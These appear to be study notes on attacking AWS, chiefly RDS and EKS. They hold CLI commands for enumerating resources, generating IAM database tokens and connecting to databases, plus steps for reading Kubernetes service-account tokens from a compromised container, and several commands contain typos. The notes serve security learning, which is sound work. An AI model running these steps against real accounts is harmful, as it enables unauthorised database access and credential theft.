    • If you have or don't have a password, you can still authenticate via the Kerberos

RDS Access Restrictions

  1. IAM level access restriction.
  2. Network level access restriction.

Pasted-image-20221108061748.png

RDS Proxy

  • Pasted-image-20221108062831.png
  • Handles the traffic between the application and the RDS
  • Helps enforcing the IAM authentication by storing the creds in Secret Manager and then make the Proxy access the RDS via a secret, the Proxy will be able to fetch this secret by using an IAM role.

Attacking RDS

Enumeration

bash
# Get info about `RDS` Clusters
aws rds describe-db-culsters
 
# Get info about stand-alone instances (not in cluster)
aws rds describe-db-instances
 
# Enumerate Subnet groups
aws rds describe-db-subnet-groups
 
# Enumerate DB Security Groups
aws rds describe-db-security-groups
 
# Enumerate `RDS` proxies
aws rds describe-db-proxies
  • Enumerating RDS proxies is important because it can have the rights to access db. So by abusing it, we can access the DB without having credentials

VPCSecurityGroupsDBSecurityGroups
- Is a virtual Firewall.- Is a virtual Firewall.
- It Controls the traffic from & to database instances that are part of a VPC- It Controls the traffic from & to database instances that are NOT part of a VPC

Exfiltration

List DB Instances

bash
aws rds describe-db-instances
  • MasterUsername can be found in the description of the DB Pasted-image-20221113053749.png
bash
aws ec2 describe-security-groups --group-ids GroupID

Connect to DB using Basic Authentication

bash
mysql -h HostName -u username -p password -P POST

IAM-based authentication

bash
aws sts get-caller-identity
  • If we run this command from within an EC2 Instance we can get the privileges/Roles of it Pasted-image-20221113054155.png

List all Attached policies to this Role

bash
aws iam list-attached-policies --role-name ROLE-NAME
aws iam list-attached-policies --role-name ROLE-NAME --version-id v1
  • Always remember to enumerate the policy Versions
  • This action indicates that this instance have the rights to authenticate to all the databases Pasted-image-20221113055342.png

Generating Access Token EC2 that has the Role and store it in an environment variable!

bash
Token"(aws rds generate-db-auth-token --username USERNAME --region REGION)"

Pasted-image-20221113055845.png

Get Access to the DB

bash
mysql -h HostName -u username -p $token -P PORT --enable-cleartext-plugin

Pasted-image-20221113060942.png

Containers

can be broken down into 3 concepts:

  1. Registry
    • Its a safe place where docker images are stored, ex:
      • ECR Elastic container registry.
      • Docker Hub
  2. Orchestration
    • Manages when and where your containers run, ex:
      • ECS Elastic container service.
      • EKS Elastic kubernetes service.
  3. Compute
    • Computing engines used to run containers
      • FARGATE serverless compute engine.
      • EC2 virtual machine.
  • Normal VS Cloud Containerization Pasted-image-20221116230526.png

  • Docker and Kubernetes on AWS Pasted-image-20221116231703.png

  • EKS cluster Pasted-image-20221116231259.png

Enumeration

bash
# Describe all repositories in the container registry
aws ecr describe-repositories
 
# Get info about repository policy
aws ecr get-repository-policy --repository-name rep-name
 
# List images in repository
aws ecs list-images --repository-name rep-name
 
# Get info about container image
aws ecr describe-images --repository-name repo-name --image-id img-id
 
# List `ECS` clusters
aws ecs list-clusters
 
# Get info about specific cluster
aws ecs describe-clusters --cluste cluster-name
 
# Get info about specific service
aws ecs describe-services --cluster cluster-name --services service-name
 
# List tasks in cluster
aws ecs list-tasks --cluster clustername
 
# Get info about specific task
aws ecs describe-tasks --cluster cluster-name --task taskARN
 
# List all containers in cluster
aws ecs list-container-instances --cluster cluster-name
 
# List all `EKS` clusters
aws eks list-clusters
 
# Get info about specific cluster
aws eks describe-clusters --cluste cluster-name
 
# List node groups in cluster
aws eks list-nodegroups --cluster-name clustername
 
# Get info about a specific node group in cluster
aws eks describe-nodegroup --cluster-name cluster-name --nodegroup-name nodegroup-name
 
# List all `Fargate` in a cluster
aws eks list-fargate-profile --cluster-name cluster-name
 
# Get info about specific `Fargate` profile in a cluster
aws eks describe-fargate-profile --cluster-name cluster-name --fargate-profile-name profile-name

Kubernetes service accounts and tokens

  • Kubernetes have service accounts

  • These Service Accounts are used to manage kubernetes resources (PODS, nodes, deployments, ...) from within a POD

  • creating a servie account

    bash
    kubectl create sa service-acc
  • Get service accounts

    bash
    kubectl get sa
  • Getting kubernetes token from a running EKS vulnerable container from an RCE

    bash
    cat /var/run/secrets/kubernetes.io/serviceaccount/token
  • Now this service account has a token created (before kubernetes 1.2.4), we can get it with

    bash
    kubectl get secret

    Pasted-image-20221117012937.png

  • Get a secret

    bash
    kubectl describe secret secret-name
  • After 1.2.4 you have to create it

    bash
    kubectl create token service-acc
  • This secret is a JWT , and after 1.2.4 it will have expiration date/time.

  • We can define the duration with

    bash
    kubectl create token service-acc --duration=1000h
  • The secret of the service account is mounted in side the POD, we can get where its mounted by

    bash
    kubectl describe pod nginx

    Pasted-image-20221117013935.png

  • Get the secret

    bash
    kubectl exec -it nginx -- cat /var/run/secrets/kubernetes.io/serviceaccount/tooken